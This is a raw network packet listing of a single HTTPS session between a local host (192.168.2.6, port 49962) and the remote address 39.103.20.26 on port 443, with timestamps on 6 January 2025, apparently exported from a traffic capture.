Jan 6, 2025 04:50:45.333072901 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.333142996 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.333163023 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.333231926 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.338767052 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.338845015 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.338860035 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.338916063 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.344480038 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.344515085 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.344557047 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.344563007 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.344599009 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.344610929 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.348491907 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.348522902 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.348551035 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.348560095 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.348588943 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.348607063 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.354295969 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.354326963 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.354345083 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.354402065 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.354410887 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.354454994 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.359900951 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.359941959 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.359963894 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.359968901 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.360003948 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.360023022 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.365706921 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.365792990 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.365931034 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.365981102 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.371723890 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.371819973 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.371866941 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.371923923 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.374214888 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.374258041 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.374288082 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.374293089 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.374322891 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.374344110 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.377587080 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.377631903 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.377669096 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.377675056 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.377712965 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.377726078 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.381021976 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.381052971 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.381083965 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.381088018 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.381119013 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.381145954 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.385770082 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.385824919 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.385880947 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.385958910 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.387895107 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.387949944 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.387999058 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.388055086 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.390113115 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.390163898 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.390275955 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.390332937 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.393727064 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.393783092 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.393898010 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.393969059 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.414213896 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.414263964 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.414299965 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.414304018 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.414350033 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.414366007 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.419775009 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.419833899 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.419903994 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.419949055 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.423496008 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.425530910 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.425581932 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.425600052 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.425604105 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.425648928 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.431169033 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.431231022 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.431294918 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.431346893 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.435230970 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.435286999 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.435318947 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.435391903 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.440973997 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.441042900 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.441071033 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.441123962 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.446851969 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.446872950 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.446907043 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.446911097 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.446939945 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.446962118 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.452627897 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.452657938 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.452687025 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.452691078 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.452718973 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.452738047 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.458600998 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.458636045 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.458652020 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.458656073 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.458694935 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.458709002 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.461260080 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.461294889 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.461308002 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.461316109 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.461338043 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.461354971 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.464437962 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.464474916 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.464504004 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.464509964 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.464534998 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.464555979 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.467819929 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.467886925 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.467947006 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.467995882 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.472487926 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.472532988 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.472570896 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.472618103 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.474718094 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.474765062 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.474841118 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.474889040 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.477061987 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.477107048 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.477118969 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.477123022 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.477153063 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.477161884 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.480644941 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.480673075 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.480688095 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.480691910 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.480725050 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.480745077 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.501030922 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.501085043 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.501096010 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.501138926 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.506716013 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.506748915 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.506777048 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.506788015 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.506808043 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.506958008 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.512434959 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.512484074 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.512515068 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.512563944 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.512634039 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.518047094 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.518094063 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.518105030 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.518114090 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.518152952 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.518163919 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.522041082 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.522089005 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.522119999 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.522162914 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.522212029 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.527955055 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.527990103 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.528012991 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.528017998 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.528048038 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.528063059 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.533541918 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.533595085 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.533601999 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.533607960 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.533636093 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.533654928 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.539376974 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.539427996 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.539436102 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.539483070 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.545370102 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.545413971 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.545428991 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.545496941 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.547769070 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.547815084 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.547821045 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.547827005 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.547869921 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.551264048 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.551309109 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.551322937 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.551330090 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.551357985 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.551373005 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.554681063 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.554713011 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.554745913 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.554753065 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.554765940 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.554795980 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.555603027 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.559247971 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.559304953 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.561464071 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.561518908 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.561541080 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.561592102 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.563803911 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.563858986 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.563898087 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.563946962 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.567367077 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.567420959 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.567450047 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.567493916 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.587807894 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.587872982 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.587888956 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.587934017 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.593349934 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.593385935 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.593404055 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.593410969 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.593426943 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.593450069 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.599193096 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.599253893 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.599299908 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.599350929 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.604728937 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.604770899 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.604825020 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.604825020 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.604835987 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.604847908 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.604876995 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.608828068 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.608871937 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.608881950 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.608887911 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.608916044 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.608936071 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.614659071 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.614708900 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.614746094 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.614793062 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.620368958 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.620414019 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.620424032 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.620433092 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.620464087 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.620498896 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.626194954 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.626220942 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.626250029 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.626254082 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.626279116 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.626291990 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.631973982 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.632020950 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.632080078 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.632124901 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.634412050 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.634452105 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.634490013 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.634533882 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.637856007 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.637903929 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.637949944 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.637994051 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.641179085 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.641242027 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.641288042 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.641340017 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.646044970 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.646091938 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.646104097 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.646151066 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.648371935 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.648406982 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.648433924 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.648437977 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.648464918 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.648488998 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.650682926 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.650723934 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.650746107 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.650748968 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.650760889 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.650787115 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.654253960 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.654277086 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.654303074 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.654309988 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.654321909 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.654344082 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.674650908 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.674710035 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.674799919 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.674844027 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.680229902 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.680279016 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.680284023 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.680298090 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.680337906 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.686048031 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.686090946 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.686115980 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.686120987 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.686148882 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.686167002 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.691541910 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.691606998 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.691692114 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.691742897 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.695593119 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.695652008 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.695724964 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.695775986 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.701476097 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.701514006 CET	443	49962	39.103.20.26	192.168.2.6
